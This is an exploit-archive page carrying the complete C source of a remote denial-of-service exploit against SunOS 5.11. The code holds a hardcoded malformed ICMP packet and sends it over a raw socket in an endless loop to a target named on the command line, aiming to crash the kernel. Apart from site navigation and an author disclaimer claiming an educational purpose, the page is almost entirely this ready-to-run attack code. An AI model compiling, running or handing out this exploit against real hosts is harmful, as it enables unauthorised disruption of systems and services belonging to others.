Exploit the possiblities

SunOS 5.11 Remote ICMP Weakness Kernel Denial Of Service

SunOS 5.11 Remote ICMP Weakness Kernel Denial Of Service
Posted Jan 21, 2017
Authored by Todor Donev

SunOS version 5.11 remote ICMP weakness kernel denial of service exploit.

tags | exploit, remote, denial of service, kernel
systems | solaris
MD5 | 0ffe0fe030d2bf7166687120627b323a

SunOS 5.11 Remote ICMP Weakness Kernel Denial Of Service

Change Mirror Download
/*
* SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit
*
* Todor Donev <todor.donev@gmail.com>
* http://www.ethical-hacker.org/
* https://www.facebook.com/ethicalhackerorg
*
* Disclaimer:
* This or previous programs is for Educational
* purpose ONLY. Do not use it without permission.
* The usual disclaimer applies, especially the
* fact that Todor Donev is not liable for any
* damages caused by direct or indirect use of the
* information or functionality provided by these
* programs. The author or any Internet provider
* bears NO responsibility for content or misuse
* of these programs or any derivatives thereof.
* By using these programs you accept the fact
* that any damage (dataloss, system crash,
* system compromise, etc.) caused by the use
* of these programs is not Todor Donev's
* responsibility.
*
* Use them at your own risk!
*
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

unsigned char b00m[75] =
{
0x45, 0xFF, 0x00, 0x4D, 0x0C,
0x52, 0x00, 0x00, 0x7E, 0x01,
0x0C, 0xF2, 0x85, 0x47, 0x21,
0x07, 0xC0, 0xA8, 0x0E, 0x58,
0x03, 0x01, 0xAE, 0x37, 0x6F,
0x3B, 0x66, 0xA7, 0x60, 0xAA,
0x76, 0xC1, 0xEC, 0xA7, 0x7D,
0xFA, 0x8A, 0x72, 0x8E, 0xC6,
0xE3, 0xD2, 0x64, 0x13, 0xE7,
0x4D, 0xBC, 0x01, 0x40, 0x5B,
0x8E, 0x8B, 0xE5, 0xEE, 0x5E,
0x37, 0xDD, 0xC2, 0x54, 0x8E,
0x8D, 0xCE, 0x0C, 0x42, 0x97,
0xA1, 0x8C, 0x04, 0x8A, 0xC2,
0x6B, 0xAE, 0xE9, 0x2E, 0xFE,
} ;

long resolve(char *target){
struct hostent *tgt;
long addr;

tgt = gethostbyname(target);
if (tgt == NULL)
return(-1);
memcpy(&addr,tgt->h_addr,tgt->h_length);
memcpy(b00m+16,&addr,sizeof(long));
return(addr);
}
int main(int argc, char *argv[]){
struct sockaddr_in dst;
long saddr, daddr;
int s0cket;
printf("[ SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit\n");
printf("[ Todor Donev <todor.donev@gmail.com> www.ethical-hacker.org\n");
if (argc < 2){
printf("[ Usage: %s <target>\n", *argv);
return(1);
}
daddr = resolve(argv[1]);
saddr = INADDR_ANY;
memcpy(b00m+16, &daddr, sizeof(long));
dst.sin_addr.s_addr = daddr;
dst.sin_family = AF_INET;
s0cket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s0cket == -1)
return(1);
printf("[ ICMP Attacking: %s\n", argv[1]);
while(1){
if (sendto(s0cket,&b00m,75,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1){
perror("[ Error");
exit(-1);
}
}
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close